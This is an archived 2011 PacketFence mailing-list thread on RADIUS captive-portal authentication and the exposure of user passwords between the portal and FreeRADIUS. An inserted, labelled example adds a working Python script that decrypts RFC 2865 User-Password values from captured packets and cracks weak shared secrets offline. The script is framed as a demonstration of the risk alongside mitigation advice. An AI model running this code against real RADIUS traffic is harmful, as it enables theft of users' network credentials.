>This, of course, doesn't address your point of traffic between PF and radius 
>but I think that it's another encrypted channel between radius and the ldap 
>side of things ...

Usually the traffic between FR and the LDAP backend is encrypted, but it is not 
necessary to make it function ... highly advisable, but not a requisite 
...unless your LDAP only stores encrypted user account info (I believe MS AD is 
this way)

>We have a dedicated radius installation on the PF server itself ; all traffic 
>between the two is therefore loopback and I don't think it can at all be seen 
>from outside the box. (Please let me know if this is a misconception !)

You are correct, the loopback traffic will not be visible on the wire. However, 
in our deployment the FR server and the PF server are not the same; they are on 
a dedicated server VLAN, so that mitigates our risk. But if someone else deploys 
the same setup and the data must traverse VLANs that may not be for servers 
only, the data would be easily stolen.  Think if a branch office deployed PF and 
wanted to use a FR server at the main branch to do the captive portal auth; 
they would be sending that info across public links ... very bad idea in this 
case : ).  An easy workaround would be to set up a FR server on the PF box that 
would then proxy encrypted requests to the correct FR server, but that could be 
difficult for someone who is not well versed in FR.

My more immediate concern is that anyone looking at the debug output of the FR 
server will be able to watch user names and passwords scroll by in completely 
clear text. Again, in a complex environment where the same people may not manage 
the FR server and the PF server, that may be an issue, not to mention the 
regulatory concerns; I am speaking of regulations like Sarbanes-Oxley, HIPAA, 
FERPA, etc.  BTW:  even if your FR server is the same as your PF server, this 
still applies. 

Jake Sallee
Godfather Of Bandwidth
Network Engineer

Fone: 254-295-4658
Phax: 254-295-4221
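Added example, not code from this thread and not PacketFence or FreeRADIUS code: when the captive portal relays a login to RADIUS over PAP, the only thing protecting the password on the wire between the PF box and the RADIUS server is the User-Password hiding of RFC 2865 section 5.2, which is an MD5 stream keyed solely by the shared secret. The script below builds one Access-Request the way a PAP client would, shows what an on-path observer recovers once they hold the secret, and shows how a weak or default secret is recovered offline from a single captured datagram, with no traffic to the server. The user name, the password, the word list, the fixed authenticator in the test and the use of FreeRADIUS's stock example client secret `testing123` are all constructed for the demonstration.

```python
from __future__ import annotations

import hashlib
import os
import struct
from typing import Iterable, Optional, Tuple

# RADIUS packet code and attribute types from RFC 2865.
ACCESS_REQUEST = 1
ATTR_USER_NAME = 1
ATTR_USER_PASSWORD = 2


def hide_password(password: bytes, secret: bytes, authenticator: bytes) -> bytes:
    """RFC 2865 section 5.2: pad with NULs to a 16-octet multiple, then XOR each
    block with MD5(secret || previous ciphertext block), seeded with the
    Request Authenticator. There is no integrity and no per-session key."""
    if len(password) > 128:
        raise ValueError("User-Password is at most 128 octets")
    padded = password + b"\x00" * (-len(password) % 16)
    if not padded:
        padded = b"\x00" * 16  # an empty password still occupies one block
    hidden, prev = b"", authenticator
    for i in range(0, len(padded), 16):
        block = hashlib.md5(secret + prev).digest()
        prev = bytes(p ^ b for p, b in zip(padded[i:i + 16], block))
        hidden += prev
    return hidden


def reveal_password(hidden: bytes, secret: bytes, authenticator: bytes) -> bytes:
    """Inverse of hide_password. Returns the still-padded plaintext so a caller
    can judge whether a guessed secret produced plausible output."""
    if not hidden or len(hidden) % 16:
        raise ValueError("User-Password value must be a non-empty multiple of 16 octets")
    clear, prev = b"", authenticator
    for i in range(0, len(hidden), 16):
        block = hashlib.md5(secret + prev).digest()
        chunk = hidden[i:i + 16]
        clear += bytes(c ^ b for c, b in zip(chunk, block))
        prev = chunk
    return clear


def build_access_request(username: bytes, password: bytes, secret: bytes,
                         ident: int = 1, authenticator: Optional[bytes] = None) -> bytes:
    """Assemble a minimal PAP Access-Request: Code, Identifier, Length,
    16-byte Request Authenticator, then type/length/value attributes."""
    authenticator = authenticator or os.urandom(16)
    attrs = b""
    for attr_type, value in ((ATTR_USER_NAME, username),
                             (ATTR_USER_PASSWORD, hide_password(password, secret, authenticator))):
        attrs += struct.pack("!BB", attr_type, len(value) + 2) + value
    return struct.pack("!BBH", ACCESS_REQUEST, ident, 20 + len(attrs)) + authenticator + attrs


def parse_packet(packet: bytes) -> Tuple[int, int, bytes, dict]:
    """Split a RADIUS datagram into (code, identifier, authenticator, {type: value})."""
    code, ident, length = struct.unpack("!BBH", packet[:4])
    if length < 20 or length != len(packet):
        raise ValueError("RADIUS length field disagrees with datagram size")
    attrs, pos = {}, 20
    while pos < length:
        attr_type, attr_len = packet[pos], packet[pos + 1]
        if attr_len < 2 or pos + attr_len > length:
            raise ValueError("malformed attribute")
        attrs[attr_type] = packet[pos + 2:pos + attr_len]
        pos += attr_len
    return code, ident, packet[4:20], attrs


def sniff_credentials(packet: bytes, secret: bytes) -> Tuple[bytes, bytes]:
    """What an on-path observer who already knows the shared secret gets from one
    captured datagram: the user name and the password, in clear."""
    code, _, authenticator, attrs = parse_packet(packet)
    if code != ACCESS_REQUEST:
        raise ValueError("not an Access-Request")
    clear = reveal_password(attrs[ATTR_USER_PASSWORD], secret, authenticator)
    return attrs[ATTR_USER_NAME], clear.rstrip(b"\x00")


def plausible_plaintext(padded: bytes) -> bool:
    """A wrong secret yields pseudo-random bytes; the right one yields printable
    text followed only by NUL padding. Used to score shared-secret guesses."""
    body = padded.rstrip(b"\x00")
    return bool(body) and all(0x20 <= c < 0x7F for c in body)


def crack_shared_secret(packet: bytes, wordlist: Iterable[bytes]) -> Optional[bytes]:
    """Offline dictionary attack on the shared secret from a single captured
    Access-Request: one MD5 per 16-octet block per guess, no server interaction."""
    _, _, authenticator, attrs = parse_packet(packet)
    hidden = attrs[ATTR_USER_PASSWORD]
    for guess in wordlist:
        if plausible_plaintext(reveal_password(hidden, guess, authenticator)):
            return guess
    return None


if __name__ == "__main__":
    # Constructed sample: a captive-portal login relayed over PAP using the
    # example secret that ships in FreeRADIUS's stock clients.conf.
    captured = build_access_request(b"jdoe", b"Winter2011!", b"testing123")
    print("with the secret  ->", sniff_credentials(captured, b"testing123"))
    print("secret cracked   ->", crack_shared_secret(captured, [b"radius", b"secret", b"testing123"]))
```

The packet omits NAS-IP-Address and Message-Authenticator, which does not change the hiding. The practical reading of the thread follows directly: on a shared VLAN or a public link the shared secret is the whole defence, so either keep PF and FR on loopback or a server-only VLAN, or have a local FR instance proxy over an encrypted transport as Jake suggests.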


-----Original Message-----
From: cg [mailto:[email protected]] 
Sent: Friday, January 28, 2011 10:15 AM
To: [email protected]
Subject: Re: [Packetfence-users] What's the status with Captive portal RADIUS 
Authentication ?

Hi Jake,

As we have both EAP and the captive portal in our system, we
(obviously) had to set up radius for both modes. EAP authentication has always 
worked well once we configured radius to work with our ldap system but the CP 
side of it was dodgy, at best. We have recently set up a second 'inner-tunnel' 
to channel the radius traffic to ldap.

This, of course, doesn't address your point of traffic between PF and radius 
but I think that it's another encrypted channel between radius and the ldap 
side of things ...

We have a dedicated radius installation on the PF server itself ; all traffic 
between the two is therefore loopback and I don't think it can at all be seen 
from outside the box. (Please let me know if this is a misconception !)

Thanks for the input ...

Best,

Chris

On Thu 27.Jan'11 at 22:25:31 +0000, Sallee, Stephen (Jake) wrote:
> I can attest that the RADIUS auth works for the captive portal, but it would 
> be nice if the RADIUS module would use some form of encryption for 
> communicating with the RADIUS server.  
> 
> As it stands anyone watching the debug output of the radius server can see 
> the usernames and passwords of all the users using the captive portal in 
> clear text!  It is highly unlikely that anyone would be able to sniff the 
> traffic between the PF server and the RADIUS server but if they did your 
> users' info would be amazingly easy to steal.
> 
> Jake Sallee
> Godfather Of Bandwidth
> Network Engineer
> 
> Fone: 254-295-4658
> Phax: 254-295-4221
> 
> 
> -----Original Message-----
> From: Olivier Bilodeau [mailto:[email protected]]
> Sent: Thursday, January 27, 2011 4:05 PM
> To: [email protected]
> Subject: [Packetfence-users] What's the status with Captive portal RADIUS 
> Authentication ?
> 
> Hi,
> 
> Not so long ago someone reported that they couldn't get the 
> authentication::radius module to work with their captive portal. I can't 
> recall the exact details but I wasn't provided a specific error aside from 
> "it doesn't work".
> 
> At the time, I filed a ticket for it here: #1093: regression in 
> authentication::radius
> http://www.packetfence.org/bugs/view.php?id=1093
> 
> Since then I saw the module used successfully in action.
> 
> My question is: what's the status? can I close the ticket?
> 
> Cheers!
> --
> Olivier Bilodeau
> [email protected]  ::  +1.514.447.4918 *115  ::  www.inverse.ca 
> Inverse inc. :: Leaders behind SOGo (www.sogo.nu) and PacketFence
> (www.packetfence.org)
> 
> ----------------------------------------------------------------------
> -------- Special Offer-- Download ArcSight Logger for FREE (a $49 USD 
> value)!
> Finally, a world-class log management solution at an even better price-free!
> Download using promo code Free_Logger_4_Dev2Dev. Offer expires February 28th, 
> so secure your free ArcSight Logger TODAY! 
> http://p.sf.net/sfu/arcsight-sfd2d
> _______________________________________________
> Packetfence-users mailing list
> [email protected]
> https://lists.sourceforge.net/lists/listinfo/packetfence-users
> 


